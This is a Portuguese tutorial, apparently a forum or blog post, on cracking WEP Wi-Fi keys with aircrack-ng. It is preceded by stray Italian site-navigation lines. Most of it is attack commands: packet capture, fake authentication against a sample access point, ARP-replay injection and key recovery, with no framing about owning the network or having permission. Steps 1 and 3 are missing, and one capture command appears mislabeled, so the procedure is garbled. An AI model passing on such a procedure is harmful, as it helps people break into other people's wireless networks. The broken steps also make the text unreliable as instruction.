Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
Objetivos:
=========
– Pesquisar o modo que os pacotes são transmitidos pela rede sem fio;
– Localizar uma forma de captar os pacotes através de um sniffer;
– Quebrar a senha WEP / WPA;
Nota 1:
Você pode ler meu outro post que fala sobre a criação de uma Cantena ou
Cantenna, usando uma lata de batata pringles, amplificando seu sinal. Para
quem não acredita, realmente funciona.
Nota 2:
Para poder executar os passos aqui citados, sua placa de rede PRECISA TER
SUPORTE AO MODO DE MONITORAMENTO E INJEÇÃO DE PACOTES!
http://www.aircrack-ng.org/doku.php?id=compatibility_drivers
Nota 3:
Se você tiver que comprar uma placa de rede Wireless, aproveite para achar
uma que tenha conector para acoplar antena externa.
Utilitários:
============
– Notebook rodando Mandriva Linux 2008 (ou qualquer outra distribuição linux)
dentro de uma Virtual Machine [abaixo explico os motivos]
– Aircrack-ng, aireplay, airodump-ng [ http://www.aircrack-ng.org/ ]
– Adaptador Wireless USB GWL-G122 Revisão C [ Ver compatibilidade no site
do Aircrack ]
http://www.aircrack-ng.org/doku.php#virtual_machine1
Quebrando as senhas:
===================
WEP
Mais fácil de quebrar, pois o ataque apesar de usar força bruta, utiliza
estatística e pedaços da chave enviado nos pacotes para acelerar a quebra.
Uma dica importante é não ficar esperando a rede enviar IV’s para você e sim
você tentar aumentar o número de capturas com ataques ARP, chopchop e
fragmentação.
2 – Filtre a rede desejada por canal / bssid e deixe ele parado rodando.
aircrack-ng -c canal –bssid 00:00:00:00 -w arquivo_saida interface_rede
Onde:
canal = Canal mostrado pelo comando 1
00:00:00:00 = Mac Address do AccessPoint escolhido para o ataque mostrado
no comando 1
arquivo_saida = Nome do arquivo que o aplicativo irá salvar e que será usado
para capturar a senha
interface_rede = Interface wireless usada (wifi0, rausb0, etc)
Note que há colunas mostrando Beacons e IVs.
Podemos considerar Beacons como lixo para o nosso ataque e IVs para os
pacotes que realmente interessam.
Consegui quebrar WEP com 5.000 IVs mas um número bom, gira em torno dos
80.000.
Onde:
nome = ESSID da rede, ou melhor, o nome do AccessPoint que mostra pra
você no comando 1
bssid = BSSID da rede (mac address do AP)
mac_sua_placa_rede = Mac Address da sua placa de rede
interface de rede = interface da rede wifi
Comando exemplo:
aireplay-ng -1 0 -e RedeWireless -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82
rausb0
4.1 – Abra um novo terminal e execute o aireplay para tentar gerar replicação
de pacote ARP
aireplay-ng -3 -b bssid -h mac_sua_placa interface_rede
Onde:
-3 = é o tipo de ataque ARP
bssid = Mac do AccessPoint
mac_sua_placa = Mac Address da sua placa de rede
interface_rede = Interface da rede wifi
Deixe o terminal parado por alguns minutos. Esse comando precisa de alguns
pacotes ARP na rede para gerar o tráfego. Um usuário conectado com cabo no
AP é suficiente para o ataque funcionar.
5 – Descubra a chave
aircrack-ng -b bssid arquivo*.cap
Onde:
bssid = Mac do AccessPoint que está ativo capturando pacotes
arquivo*.cap = Prefixo do arquivo colocado no comando 1
[Post no Warchalking]
http://capivara.warchalking.com.br/forum/viewtopic.php?
p=8826&sid=598caa58d4ae9c0fdfe079be733bca4a